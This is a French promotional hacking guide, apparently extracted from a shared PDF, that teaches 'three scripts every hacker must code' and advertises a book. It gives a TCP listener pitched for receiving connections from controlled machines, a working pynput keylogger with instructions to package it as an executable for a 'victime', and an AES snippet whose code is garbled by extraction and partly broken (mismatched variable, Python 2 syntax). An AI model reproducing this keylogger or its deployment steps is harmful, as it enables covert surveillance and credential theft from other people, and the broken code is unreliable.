Sie sind auf Seite 1von 12

DARK PYTHON

3 scripts que chaque hacker doit savoir coder.

B.Anass
Est-ce que vous vous êtes déjà poser la question suivante :
Pourquoi le langage de programmation Python est-il très utile pour
les hackers ?

Et bien, Lorsque vous commencez à apprendre le hacking, Python est


l’arme idéale que vous devez maîtrisez. Avec une énorme bibliothèque
standard et un système d’emballage qui met à votre portée des outils et
des frameworks prédéfinis.

Python est le langage de script dominant dans le domaine de la sécurité


informatique et le hacking, même si que le débat sur le meilleur langage de
script n’est qu’une perte de temps car chacun ses préférences chacun des
langage à son terrain d’application, et c’est ça le point fort d’apprendre un
langage de programmation...... Ça vous donne assez de flexibilité pour
créer vos outils sans être coincé dans un cadre d’outils écrit par d’autres
codeurs.

L’un des avantages de Python est ça puissance simplifié , vous pouvez


pratiquement tous avec Python ..... Il suffit de maîtriser.

Dans ce guide, je vais vous présenter 3 scripts que vous devez


impérativement apprendre à coder en tant que hacker, car dans le milieu
professionnel souvent le pentester n’aura dans son kit d’arme
qu’un shell Python depuis lequel il va devoir exécuté ses tests.

Dans ce cas, la capacité de coder rapidement des outils qui vous aident à
votre test est primordiale, vous n’allez pas surtout pas vous concentrer sur
la beauté ou l’optimisation de votre code, juste un code qui va faire le
travail.

La plupart de ces scripts sont simples et faciles à écrire ça ne nécessite


qu'une compréhension des bases du langage, donc si vous savez ce qu’est
une variable, liste, dictionnaire, tuple, objet...... Vous pouvez facilement
comprendre la logique derrière le fonctionnement de ces scripts.
PYTHON.... RÉSEAUX :

En tant que haker votre arène est le réseau, cela veut dire que vous devez
avoir une compréhension approfondie sur ce dernier, et la meilleure façon
de le faire, c’est de construire un .

L’un des plus riche module de Python est socket, c’est un module qui vous
permet par exemple de créer des TCP et UDP clients, serveurs ainsi que la
facilité de les manipulés.

So let’s take a look at :

1- Création d’un serveur TCP :


C’est l’un des plus simple code que vous alliez écrire durant toute votre vie
.

Pour comprendre mon objectif derrière la demonstration de tels scripts,


imaginez que vous êtes dans une situation ou vous n’avez
qu’un shell python sur votre machine et que c’est tout ce que vous avez
pour introduire un réseau !! Assez fort eh !.

Tout d’abord, je vous passe un résumé sur les commandes de bases afin
que vous puissiez comprendre le code qu’on va écrire :

Maintenant voici un simple script qui vous permet de créer un serveur qui
va écouter une connexion inverse :
# -*- co d in g : u t f-8 -*
im p o rt s o cke t

PORT = 8 0 8 0
# c ré a t io n d e s o c ke t
s e rve u r = s o c ke t .s o c ke t ()
p rin t ("[*]s o c ke t cré e ....")

# b in d a ve c le PORT
s e rve u r.b in d (('' ,PORT))
p rin t ('[*]b in d a ve c le p o rt % s '% (PORT))

# Ec o u t e d e la co n n e xio n in ve rs e
s e rve u r.lis t e n (5 )
p rin t ('[*]s o c ke t lis t e n in g ....' )

# On cré e u n e lo o p e n a t t e n t e d e la co n n e xio n
wh ile Tru e :
c, a d re s s e = s e rve u r.a c c e p t ()
p rin t ('[*]c o n n e c t :' ,a d re s s e )

La première ligne correspond à l’encodage utilisé dans le


code, Python utilise par défaut l’encodage ascii et si on ne lui précise pas
notre propre encodage (qui supporte les accents et tout ) il va lever une
erreur.

Puis j’ai importé le module socket, et j’ai créé une variable qui contient le
port depuis lequel je devrais recevoir ma connexion.

Ça ne reste que de créer les variables qui définissent notre serveur puis
attacher le socket avec le port et enfin mettre le serveur en écoute.

J’ai utilisé une boucle à la fin avec le mot-clé while afin que mon code reste
en attente de la connexion distante et qui va devoir afficher l’adresse IP du
serveur qui l’a sollicité.

Sauvegardez le script sous le nom SERVEUR.py puis en l’executant Le


serveur va attendre une connexion.

Vous pouvez le tester en envoyant quelques paquets de tests en utilisant


telnet ou netcat :
Voilà, je me suis connecté avec succès.

Ceci va vous être utile dans le cas ou vous créez des payloads pour
contrôler des machines à distances.
2- KEYLOGGER :
Un keylogger est une application (ou dispositif) qui tourne en arrière-plan,
son travail est d’enregistrer tous les touches tapé sur le clavier.

On va en créer un avec Python.

Pour commencer, on a besoin du module “pynput” qui n’est pas disponible


dans la librairie standard de Python, vous pouvez l’installer avec la
commande suivante :

Pip3 install pynput

Assurez que le module a été bien installer en l’important dans


l’idle comme suit :

Créez un nouveau fichier sous le nom keylogger.py et importer ce


qui suit :

fro m p yn p u t .ke yb o a rd im p o rt Ke y, Lis t e n e r

im p o rt lo g g in g

Ensuite, vous definissez une variable qui pointe vers l’endroit ou vous
souhaitez enregistrer les logs, vous pouvez la laissez vide pour sauvgarder
à coté du script keylogger.py , configurez ensuite le module de
journalisation comme indiqué ci-dessous :

lo g _d ir = ""
lo g g in g .b a s ic Co n fig (file n a m e = (lo g _d ir + "lo g .t xt "),
le ve l= lo g g in g .DEBUG, fo rm a t = '% (a s c t im e )s : % (m e s s a g e )s ')

Créez ensuite une définissions pour les pressions de touche


appelé on_press qui prend “key” comme paramètre en utilisant la
méthode info :
d e f o n _p re s s (ke y):
lo g g in g .in fo (s t r(ke y))

Pour terminier, configurez le listener :

wit h Lis t e n e r(o n _p re s s = o n _p re s s ) a s lis t e n e r:


lis t e n e r.jo in ()

Pour terminer, configurez le listener :

wit h Lis t e n e r(o n _p re s s = o n _p re s s ) a s lis t e n e r:


lis t e n e r.jo in ()

Maintenant exécutez le script et faites une recherche sur votre navigateur :

Puis arrêtez le script, et afficher le contenu de log,txt :

Il ne vous reste qu’à convertir le script en exécutable en utilisant pyinstaller.

D’abord, installez pyinstaller avec la commande :

Pip install pyinstaller

Puis avec convertissez le fichier keylogger.py en exe :


Pyinstaller keylogger.py -F

Vous trouverez le script d’envoi du fichier log.txt par e-mail depuis la


machine victime dans mon livre Dark python : Apprenez à créer vos
propres outils de hacking.
3-Encrypteur :
Dans cette partie, nous allons créer un encrypteur, mais avant d’entamer le
code qu’est ce que la cryptographie ?

La cryptographie est un le processus de transformation d’un texte qui du


sens en un texte qui n’a pas de sens pour celui qui ne lui ai pas
destiné!! Assez simple .

Pour crypter, on a besoin d’un algorithme (ou cipher) et une clé, la


puissance du cipher est mesuré par la difficulté de le casser.

Pour cette démonstration, je vais utiliser


AES(advanced encryption standard) qui est un cipher symétrique (à la fois,
l’expéditeur et le destinataire ont la même clé).

Tout d’abord, importez la fonction AES depuis le module Crypto.Cipher :


fro m Cryp t o .Cip h e r im p o rt AES

Ensuite, créez la clé et le message que vous voulez utiliser :

ke y = "clé ch iffre m e n t " # la clé d e vra it ê t re 1 6 , 2 4 , 3 2 b yt e s d e lo n g u e u r


m e s s a g e = "m e s s a g e s e cre t 0 x" # d e vra it ê t re p a rm i le s m u lt ip le s d e 1 6 .

Puis générez la clé AES et encryptez le message avec la syntaxe suivante :

Cip h e r = AES.n e w(ke y)


cip h e rt e xt = Cip h e r.e n c ryp t (p la in )

Enfin, afficher le message encrypté :

p rin t cip h e rt e xt .e n c o d e ('h e x' )

Et pour décrypter le message, il suffit d’ajouter cette ligne de code :

d e c _m e s s a g e = Cip h e r.d e c ryp t (c ip h e rt e xt )

À la fin, On aura quelque chose comme ça :

# -*- co d in g : u t f-8 -*
fro m Cryp t o .Cip h e r
im p o rt AES
ke y = "c le ch iffre m e n t "
e n c _m e s s a g e = "m e s s a g e s e c re t 0 x"

Cip h e r = AES.n e w (ke y)


cip h e rt e xt = Cip h e r.e n c ryp t (e n c _m e s s a g e )
p rin t ("m e s s a g e _e n c ryp t e : ",c ip h e rt e xt .e n c o d e ('h e x'))

d e c _m e s s a g e = Cip h e r.d e c ryp t (c ip h e rt e xt )


p rin t ("m e s s a g e _d e c ryp t e : ",d e c _m e s s a g e )

Voila, si vous executez le code vous aurez à la fois les deux deux message
encrypté et décrypté :
Si vous voulez aller plus loin...
Si vous voulez approfondir vos connaissances en Python ou si vous n’avez
pas bien compris les codes que je vous ai présentés précédemment, ce
n'est pas grave .

J’ai écrit un livre intitulé Dark Python: Apprenez à créer vos propres outils
de hacking.

CAR VOUS NE DEVIENDREZ JAMAIS HACKER SI VOUS NE SAVEZ PAS


CODER !.

La programmation vous offre la flexibilité, la souplesse, et le raisonnement


pour que vous puissiez s’adapter aux différentes situations dans lesquelles
les outils proposés par d’autres programmeurs sur le web ne répondent pas
a vos besoins, vous serrez obligé de créer l’outil adéquat par vous-même,
et c’est là que vous devez mettre vos compétences de programmation en
pratique.Ce livre est adressé au débutant hacker qui veut découvrir le
monde fascinant de la programmation, dans le but de l’aider à franchir le
cap et de créer ses propres outilsde hacking.

En lisant ce livre, vous allez :

● Apprendre à coder avec Python, en partant de zéro.


● Acquérir le mindset de hacker.
● Apprendre à créer vos propres outils qui s'adaptent aux différentes
situations dans lesquels vous vous trouvez.
Pour cela on va suivre le plan suivant :

Chapitre 1 : Python.............Introduction.
Chapitre 2 : Python.............fondamentales.
Chapitre 3 : Python Hacking............
Python Hacking............password_cracker.
Python Hacking............port_scanner.
Python Hacking............Un peu d’anonymat !.
Python Hacking............Dos_attaque.
Python Hacking............Login brute-force.
Python Hacking............Bypasser les Anti Virus.
Python Hacking.............WI-FI_stealer.

Das könnte Ihnen auch gefallen